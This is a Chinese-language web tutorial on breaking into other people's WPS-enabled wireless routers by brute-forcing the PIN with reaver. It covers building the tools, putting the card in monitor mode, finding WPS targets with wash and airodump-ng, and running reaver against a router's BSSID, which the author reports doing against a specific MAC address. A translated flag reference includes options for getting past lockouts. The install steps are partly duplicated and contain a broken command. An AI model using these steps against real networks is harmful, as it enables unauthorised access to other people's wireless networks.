需要工具：reaver
原理：窮舉PIN碼以攻破無(wú)線路由器的安全防護(hù)
安裝：
下載源碼
從這個(gè)網(wǎng)址下載reaver源代碼http://code.google.com/p/reaver-wps
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


解壓
tar-xzvf reaver-1.4.tar.gz

安裝必要的軟件依賴(lài)庫(kù)和工具
在您編譯reaver前需要先安裝pcaplib等工具，后面還需要aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編譯Reaver

cd reaver-1.4
cd src
./configure
make
下載aircrack-ng源代碼并編譯
從Ubuntu12.04版本開(kāi)始aircrack-ng不再被包含在版本軟件倉(cāng)庫(kù)中，不過(guò)我們可以從網(wǎng)上下載它的源代碼進(jìn)行編譯安裝。如果aircrack-ng已經(jīng)存在，則不必安裝。./configure
make
sudo install
解壓 tar -xzvf reaver-1.4.tar.gz

安裝必要的軟件依賴(lài)庫(kù)和工具

在您編譯 reaver前需要先安裝 pcaplib等工具，后面還需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編譯 Reaver
cd reaver-1.4 cd src ./configure make
安裝 Reaver
sudo make install

方法：

1 輸入：airmon-ng start wlan0 開(kāi)啟監(jiān)聽(tīng)模式 (屏幕顯示 加載8187L驅(qū)動(dòng)成功–一次就加載成功?。?
2 輸入：wash -i mon0 -C 查看所有開(kāi)啟WPS的無(wú)線路由 長(zhǎng)時(shí)間無(wú)反應(yīng)按Ctrl+C，結(jié)束進(jìn)程,這時(shí)記下你要PJ的目標(biāo)路由MAC.
3 輸入：airodump-ng mon0 網(wǎng)卡以混雜模式掃描所有頻道—并顯示所有AP的信息(包括 AP的信號(hào)強(qiáng)度,ESSID,MAC,頻道,加密方式,等等…..)，按Ctrl+C，結(jié)束掃描.
注:如果你已知對(duì)方無(wú)線路由信息 第2,第3步 可省略！
4 輸入：reaver -i mon0 -b MAC -a -S -vv 開(kāi)始窮舉pin碼
注:隨時(shí)可以按CTRL+C退出保存進(jìn)程，下次按下光標(biāo)控制鍵“上”鍵然后回車(chē)，進(jìn)程可繼續(xù)。
實(shí)戰(zhàn)我輸入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 )，只見(jiàn)屏幕飛閃……爽??！

reaver 參數(shù)詳解

必須參數(shù)

-i, –interface=<wlan> Name of the monitor-mode interface to use
網(wǎng)卡的監(jiān)視接口，通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可選參數(shù)
-m, –mac=<mac> MAC of the host system
指定本機(jī)MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID，一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信號(hào)的頻道，如果不指定會(huì)自動(dòng)掃描
-o, –out-file=<file> Send output to a log file [stdout]
輸出日志文件
-s, –session=<file> Restore a previous session file
恢復(fù)進(jìn)度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功后執(zhí)行命令
-D, –daemonize Daemonize reaver
設(shè)置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
對(duì)目標(biāo)AP自動(dòng)檢測(cè)高級(jí)參數(shù)
-f, –fixed Disable channel hopping
禁止頻道跳轉(zhuǎn)
-5, –5ghz Use 5GHz 802.11 channels
使用5G頻道
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告信息 -vv 可以顯示更多
-q, –quiet Only display critical messages
只顯示關(guān)鍵信息
-h, –help Show help
顯示幫助
Advanced Options:高級(jí)選項(xiàng)
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin碼
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin間延時(shí)，默認(rèn)1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS后等待時(shí)間
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次數(shù)
Reaver 參數(shù)
—天天
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失敗后等待時(shí)間，默認(rèn)0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超時(shí)，默認(rèn)5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超時(shí)，默認(rèn)0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)

不連入AP（連入過(guò)程必須有其他程序完成）
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發(fā)送NACK信息（如果一直pin不動(dòng)，可以嘗試這個(gè)參數(shù)）
-S, –dh-small Use small DH keys to improve crack speed
使用小DH關(guān)鍵值提高速度（推薦使用）
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目標(biāo)AP報(bào)告的鎖定狀態(tài)
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每當(dāng)收到EAP失敗包就終止WPS進(jìn)程
-n, –nack Target AP always sends a NACK [Auto]
對(duì)目標(biāo)AP總是發(fā)送NACK，默認(rèn)自動(dòng)
-w, –win7 Mimic a Windows 7 registrar [False]
模擬win7注冊(cè)，默認(rèn)關(guān)閉
Ps：影響到無(wú)線的因素很多，所以各參數(shù)之間的配合很重要，當(dāng)然，最關(guān)鍵的還是取決于信號(hào)。
原理詳細(xì)：
什么是PIN碼？
印在無(wú)線路由器設(shè)備標(biāo)簽上的一組8位數(shù)字字符串，無(wú)線路由器管理界面中當(dāng)然也會(huì)存在并可更改。
PIN碼有什么用？
在無(wú)線網(wǎng)卡的配套管理軟件（如TP-LINK的QSS軟件）里輸入無(wú)線路由器設(shè)備上的那8位數(shù)字字符串就可以成功登錄該已被加密的無(wú)線路由器。
窮舉PIN碼是什么意思？
既然知道了無(wú)線路由器PIN值的范圍（8位純數(shù)字），且目前大部分設(shè)備的WPS是呈開(kāi)啟狀態(tài)的，那么窮舉PIN碼以攻破無(wú)線路由器的安全防護(hù)這一暴力行為就有了*理論*可行性

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。